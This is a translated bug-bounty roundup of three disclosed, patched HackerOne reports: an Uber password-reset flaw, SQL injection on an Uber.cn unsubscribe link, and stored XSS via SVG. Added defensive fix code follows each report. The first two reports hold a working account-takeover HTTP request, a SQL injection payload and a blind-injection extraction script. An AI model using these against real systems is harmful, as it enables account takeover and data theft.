HackerOne Q3 Top 5 Vulnerability Reports - Vulnerability Alert - Black Bar Safety Net (myhack58)

ID MYHACK58:62201680770
Type myhack58
Reporter Anonymous
Modified 2016-11-01T00:00:00


Foreword

HackerOne's Top 5 vulnerability reports for the third quarter have been announced. This quarter we attended the hacker conferences in Las Vegas, hosted Hack the World, and answered questions about HackerOne in a Reddit discussion. Since the platform was founded, HackerOne vulnerability reports have earned more than $10,000,000 in bounties, and, more importantly, they have helped many companies find heavyweight vulnerabilities like the ones below. These five were not picked by rough estimate: they were assessed carefully so that the content does not repeat itself and is not merely a summary of the bug. The details of a vulnerability are the most instructive part, and that is why we publish them.

Vulnerability details

One. Mongo found a vulnerability while reviewing Uber's passwordless sign-up mechanism. Uber fixed it within a day, and after Mongo confirmed the fix he received $10,000. Uber thanked Mongo warmly, and we are very pleased to have people like Mongo on HackerOne.

The vulnerability Mongo found is as follows: through /rt/users/passwordless-signup, the password of any Uber user could be changed. All that was needed was the victim's phone number, or a brute-force pass over phone numbers to find ones that were already registered. Mongo ran the following test with his own phone number:

    POST /rt/users/passwordless-signup HTTP/1.1
    Host: cn-geo1.uber.com
    User-Agent: client/iphone/2.137.1
    Connection: close
    Content-Type: application/json
    Content-Length: 197

    {"phoneNumberE164":"+xxxxxxxx","userWorkflow":"PASSWORDLESS_SIGNUP","userRole":"client","mobileCountryISO2":"XX","state":"CREATE_NEW_PASSWORD","newPasswordData":{"newPassword":"12345678911a!"}}

The HTTP response is as follows:

    {"phoneNumberE164":"+xxxxxxxx","serverState":"SUCCEEDED","serverStateData":{"nextState":"SIGN_IN"},"tripVerifyStateData":{},"userMessage":"New password has been created. Please login with the new Password.","userRole":"client","userWorkflow":"PASSWORDLESS_SIGNUP"}

Test steps:
1. First register a rider account (an iOS or Android client will do).
2. Send the POST request shown above, with the phoneNumberE164 field set to the phone number whose password is to be changed, prefixed with its country code (+1xxx for the United States). The request may have to be repeated twice; eventually the response reads "New password has been created", which means that phone number's password has been changed to the value of the newPassword field in the POST body.
3. Log in with the new password at http://riders.uber.com or from another device.

Two. In this series of reports, only Orange knows how to get the most out of travelling. While in China, Orange tried to unsubscribe from an Uber mailing and found a SQL injection vulnerability in the Uber.cn domain; the report earned $4,000.

The vulnerability Orange discovered is as follows: while travelling in China and using Uber, he received an Uber advertising e-mail that contained an unsubscribe link. He noticed that this unsubscribe link differed from the usual one, and that it was vulnerable to SQL injection. The payload is as follows:

http://sctrack.email.uber.com.cn/track/unsubscribe.do?p=eyJ1c2VyX2lkIjogIjU3NTUgYW5kIHNsZWVwKDEyKT0xIiwgInJlY2VpdmVyIjogIm9yYW5nZUBteW1haWwifQ==

Opening this link makes the database sleep for 12 seconds. The p parameter is base64-encoded; decoded, it reads:

http://sctrack.email.uber.com.cn/track/unsubscribe.do?p={"user_id": "5755 and sleep(12)=1", "receiver": "orange@mymail"}

Orange then wrote a blind-injection script that recovers the database user and database name one character at a time:

    import json
    import string
    import requests
    from urllib.parse import quote   # Python 3; the original was Python 2 (from urllib import quote)
    from base64 import b64encode

    # character set tried at each position of the user() string
    base = string.digits + '_-@.'
    payload = {"user_id": 5755, "receiver": "blog.orange.tw"}

    for l in range(0, 30):                      # position l+1 of user()
        for i in 'i' + base:
            # boolean oracle: the unsubscribe page only returns a body when the condition holds
            payload['user_id'] = "5755 and mid(user(),%d,1)='%c'#" % (l + 1, i)
            new_payload = json.dumps(payload)
            new_payload = b64encode(new_payload.encode()).decode()
            r = requests.get('http://sctrack.email.uber.com.cn/track/unsubscribe.do?p=' + quote(new_payload))
            if len(r.content) > 0:
                print(i, end='')
                break

He eventually recovered the MySQL user name sendcloud_w@... and the database name sendcloud.

Three. Paragonie_Scott runs one of the stronger teams on HackerOne, and while analysing this unusual .svg report he reminded us how out of the ordinary SVG is: unlike other image formats, an SVG file is structured as code and can execute. Abdullah received the largest bounty the Paragon programme has paid, and the report has had 3,500 page views.

The vulnerability is as follows. Premise: browsers handle SVG files badly, so if user-uploaded SVG files have to be handled, the user must only be allowed to have them served with the Content-Type text/plain. Background: Abdullah ran into a problem while setting up Airship on Ubuntu, so he tested on Paragon's site. Uploading any file (HTML, SWF, and so on) in an attempt to trigger XSS resulted in a Content-Type of "text/plain;charset=us-ascii". The same was true for images, but if the uploaded file was an SVG whose contents were JavaScript, the upload was still allowed and it was served with "Content-Type: image/svg+xml; charset=us-ascii". That let the attack succeed, stored in the user's account.
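For the first report, an added example (not Uber's code) of the fix the passwordless-signup bug calls for: the "state" field in the request is never trusted on its own; the password step is reachable only after this server has verified a one-time code for that phone number. PasswordlessFlow, OTP_TTL and the phone number used are this example's own assumptions.

```python
import hmac
import secrets
import time

OTP_TTL = 300  # seconds a one-time code stays valid (constructed value)


class PasswordlessFlow:
    """Server-side state for a phone-number sign-up / password-reset flow."""

    def __init__(self):
        self._sessions = {}  # phone -> {"otp": str|None, "expires": float, "verified": bool}
        self.passwords = {}  # phone -> password; stand-in for the real (hashed) user store

    def start(self, phone):
        """Step 1: the server generates the code and records the flow as unverified."""
        otp = f"{secrets.randbelow(10 ** 6):06d}"
        self._sessions[phone] = {"otp": otp, "expires": time.time() + OTP_TTL, "verified": False}
        return otp  # would go out by SMS; returned only so the example runs offline

    def verify(self, phone, otp):
        """Step 2: constant-time compare, bounded lifetime, single use."""
        s = self._sessions.get(phone)
        if s is None or s["otp"] is None or time.time() > s["expires"]:
            return False
        if not hmac.compare_digest(s["otp"].encode(), str(otp).encode()):
            return False
        s["verified"] = True
        s["otp"] = None  # the code cannot be replayed
        return True

    def handle(self, request):
        """Step 3: a password is set only if *this server* marked the phone as
        verified; a client-supplied "state" of CREATE_NEW_PASSWORD changes nothing."""
        phone = request.get("phoneNumberE164")
        s = self._sessions.get(phone)
        if request.get("state") != "CREATE_NEW_PASSWORD":
            return {"serverState": "FAILED", "serverStateData": {"nextState": "START"}}
        if s is None or not s["verified"]:
            return {"serverState": "FAILED", "serverStateData": {"nextState": "VERIFY_OTP"}}
        self.passwords[phone] = request["newPasswordData"]["newPassword"]
        del self._sessions[phone]  # one verified session sets one password
        return {"serverState": "SUCCEEDED", "serverStateData": {"nextState": "SIGN_IN"}}
```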
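For the second report, an added example (not Uber's or the mailer's code) of how the unsubscribe endpoint should treat its p parameter: decode it, enforce the types the query needs (integer user_id, e-mail-shaped receiver) and bind both as SQL parameters. The page's own injected link is used as input; an in-memory SQLite table, the row in it, and the function names are this example's assumptions.

```python
import base64
import json
import re
import sqlite3
from urllib.parse import parse_qs, quote, urlsplit

EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+$")

def decode_p(url):
    """Return the JSON object carried in ?p= (URL-decoded, then base64-decoded)."""
    p = parse_qs(urlsplit(url).query).get("p", [None])[0]
    if p is None:
        raise ValueError("missing p parameter")
    obj = json.loads(base64.b64decode(p, validate=True))
    if not isinstance(obj, dict):
        raise ValueError("p must encode a JSON object")
    return obj

def encode_p(obj):
    """Build the parameter the way the mailer does (helper so the example runs offline)."""
    return quote(base64.b64encode(json.dumps(obj).encode()).decode())

def validate(obj):
    """Only an integer user_id and an e-mail-shaped receiver get through.
    The injected value "5755 and sleep(12)=1" arrives as a str and is rejected here."""
    uid, rcv = obj.get("user_id"), obj.get("receiver")
    if type(uid) is not int or uid <= 0:
        raise ValueError("user_id must be a positive integer")
    if not isinstance(rcv, str) or not EMAIL_RE.match(rcv):
        raise ValueError("receiver must be an e-mail address")
    return uid, rcv

def unsubscribe(conn, url):
    """True if exactly one subscriber row was deactivated, False if the request was refused."""
    try:
        uid, rcv = validate(decode_p(url))
    except ValueError:  # also covers bad base64 (binascii.Error) and bad JSON
        return False
    cur = conn.execute(
        "UPDATE subscribers SET active = 0 WHERE user_id = ? AND receiver = ?", (uid, rcv))
    conn.commit()
    return cur.rowcount == 1

def make_db():
    """In-memory SQLite stand-in for the mailer's subscriber table (constructed row)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE subscribers (user_id INTEGER, receiver TEXT, active INTEGER)")
    conn.execute("INSERT INTO subscribers VALUES (5755, 'orange@mymail', 1)")
    return conn
```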
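For the third report, an added example (not Paragon's Airship code) of the serving rule the premise above describes: an uploaded SVG is sent as image/svg+xml only when it contains nothing that can run, and everything else goes out as inert text/plain with a forced download and a sandboxing CSP. The element and attribute checks, header set, and sample files are this example's own choices.

```python
import re
import xml.etree.ElementTree as ET  # use defusedxml in production to resist entity expansion

ACTIVE_ELEMENTS = {"script", "foreignobject"}
URL_SCHEME_RE = re.compile(r"^\s*(javascript|data):", re.I)

def local(name):
    """Drop the XML namespace: '{http://www.w3.org/2000/svg}script' -> 'script'."""
    return name.rsplit("}", 1)[-1].lower()

def svg_is_active(data):
    """True if the SVG could run code: <script>, <foreignObject>, on* event handlers,
    or an href/xlink:href pointing at a javascript:/data: URL. Unparsable input counts
    as active; whatever it is, it is not a plain image."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return True
    for el in root.iter():
        if local(el.tag) in ACTIVE_ELEMENTS:
            return True
        for attr, value in el.attrib.items():
            a = local(attr)
            if a.startswith("on") or (a == "href" and URL_SCHEME_RE.match(value)):
                return True
    return False

def headers_for_upload(filename, data):
    """Response headers the file-serving endpoint should emit for a stored upload.
    Only a passive SVG is served as image/svg+xml; everything else is inert text."""
    if filename.lower().endswith(".svg") and not svg_is_active(data):
        return {"Content-Type": "image/svg+xml",
                "Content-Security-Policy": "script-src 'none'; object-src 'none'",
                "X-Content-Type-Options": "nosniff"}
    return {"Content-Type": "text/plain; charset=us-ascii",
            "Content-Disposition": "attachment",
            "Content-Security-Policy": "sandbox",
            "X-Content-Type-Options": "nosniff"}

# Constructed samples: a passive icon and three "SVG that is really JS" files.
CLEAN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>'
SCRIPT_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><script>console.log(1)</script></svg>'
HANDLER_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" onload="console.log(1)"/>'
HREF_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
            b'<a xlink:href="javascript:console.log(1)"><text>x</text></a></svg>')
```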
